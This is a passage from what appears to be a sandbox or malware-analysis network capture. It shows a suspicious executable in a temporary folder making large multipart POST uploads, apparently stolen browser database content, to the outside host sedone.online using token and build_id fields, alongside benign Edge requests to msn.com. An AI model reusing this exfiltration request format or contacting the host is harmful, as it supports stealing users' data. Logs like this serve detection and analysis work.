                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:21 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                2024-12-16 12:47:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:22 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                27192.168.2.849816116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----F3OZCT0ZMOZM7Y5P8Y5F
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 393697
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 5a 43 54 30 5a 4d 4f 5a 4d 37 59 35 50 38 59 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------F3OZCT0ZMOZM7Y5P8Y5FCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:24 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                28192.168.2.84981123.200.88.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:24 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                Host: assets.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC1004INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:25 GMT
                                                                                                                                                                                                                                                                Content-Length: 354
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Akamai-Request-BC: [a=23.200.89.140,b=345410735,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                Akamai-Server-IP: 23.200.89.140
                                                                                                                                                                                                                                                                Akamai-Request-ID: 14968caf
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                Akamai-GRN: 0.8c59c817.1734353245.14968caf
                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                29192.168.2.849826116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAA1NGVKNGV37Y58Q9RI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                                Connection: Keep-Alive
